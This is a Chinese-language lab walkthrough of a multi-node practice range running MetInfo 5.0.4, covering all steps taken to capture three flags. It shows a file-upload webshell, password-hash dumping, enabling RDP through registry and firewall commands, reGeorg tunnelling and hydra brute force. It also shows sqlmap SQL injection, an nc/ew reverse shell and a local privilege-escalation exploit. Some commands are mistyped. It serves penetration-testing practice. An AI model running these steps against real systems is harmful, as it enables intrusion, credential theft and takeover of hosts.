多节点靶机练习(1)-metlnfo靶场练习

实验环境：

火狐，虚拟机（导入三台靶机）

靶场下载地址：

链接：https://pan.baidu.com/s/1vI92T-V60M08GiBtcuIDMQ
提取码：xtgy

实验要求：不能操作虚拟机

任务：寻找3个flag

环境搭建：

1.设置靶场网卡为VMnet3

2.将物理机VMnet3设置为100网段
3.浏览器测试靶场输入ip：192.168.100.130

实验步骤：

一.信息收集

滑到最底部：

已经知道网站是Metlnfo 5.0.4版本，去网上搜一下，看看有什么漏洞

之前有爆出过漏洞，自己可以利用并复现下，在网上可以搜出来的，所以啊，信息收集很重要哦

二.文件上传漏洞利用

此处有一个文件上传漏洞：访问一下试试：
http://192.168.100.130/admin/include/uploadify.php

发现不能访问，现在寻找一串poc复制下来，改为html文件，方便上传


记得哦，里面路径一定要改一下，不然还是没用，访问不了的：

用谷歌打开poc.html

上传一个大马（可以在网上下载,也可以上传一句话木马用菜刀连接）：

上传成功：复制路径并访问：/upload/file/1574391176.php

密码为admin—>:login

查看当前用户whoami：为system，所以此处不用提权了

获取密码hash值：上传QuarksPwDump.exe（在没有登陆过的情况下，获取密码）

执行命令：C:/phpStudy2013/WWW/upload/file/QuarksPwDump.exe --dump-hash-local

MD5解密：密码a1b2c3

查看开放端口：netstat -ano > 1.txt

没有开放3389端口
开放3389端口命令：
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
再看一下：

3389端口开放了：
尝试远程登录:mstsc

连接失败，可能是防火墙没有开放3389端口
开启防火墙3389：netsh firewall set portopening TCP 3389 ENABLE

再次尝试远程连接，成功：

进入桌面，找到第一个flag

三．破解内网信息
当前为管理员权限，所以现在不用提权
现在我们来看一个问题：cmd->ipconfig

有两块网卡：10.200.1.10
现在有两种情况：①可以通过代理进行扫描
②通过用户的历史记录
历史记录：C:\Documents and Settings\Administrator\Local Settings\History


这是ftp，无法访问

返回点登陆

没有密码，现在可以爆破
使用代理，先端口转发
用大马上传reGeorg：tunnel.nosocket.php，放在www下面


现在将reGeorg-master放在kali里面
执行命令：python reGeorgSocksProxy.py -u http://192.168.100.130/tunnel.nosocket.php

再打开一个页面执行命令：proxychins hydra -l admin -P ssh://10.200.1.15
爆破出内网ftp密码：admin 123456

登录ftp

里面有一个oa目录，打开发现找到了flag2

打开Index页面


再次点击index.php

还有一个admin目录，里面有一个login.php，点进去看看，没有账号密码

现在爆破一下10.200.1.16的账号密码，
有一个message.php文件，在浏览器中打开


输入id 1=1跟1=2页面有差异，可能存在数值型sql注入
Order by判断出有2个显示位
是联合查询注入
用sqlmap跑一下：
所有数据库：proxychains sqlmap -u http://10.200.1.16/message.php?id=1 -p id --technique=U --union-cols=2 --tamper space2comment --level 5 – risk 3 --dbs

my_oa数据库下的所有表：
proxychains sqlmap -u http://10.200.1.16/message.php?id=1 -p id --technique=U --union-cols=2 --tamper space2comment --level 5 – risk 3 -D my_oa --tables

密码解密后：a1b2c3
登录oa：

进入点开个人信息：

点修改图片并上传大马：复制图片路径在浏览器打开

进入后看一下当前用户：apache
需要提权：查看系统版本，并上传相应版本的exp

在物理机上进入nc目录下，Nc监听端口：nc.exe -lvvp 5555

进行端口转发：上传ew，执行命令：ew_for_Win.exe -s lcx_tran -l 4444 -f 192.168.100.1 -g 5555

反弹端口：
在大马命令行执行：bash -i >&/dev/etc10.200.1.10/4444 0> &1

利用大马上传相对应的exp

在物理机的大马上切换到上传exp的路径，更改exp权限，执行命令chomd 777，执行”exp路径/exp,提权成功，切换到root目录下，找到flag3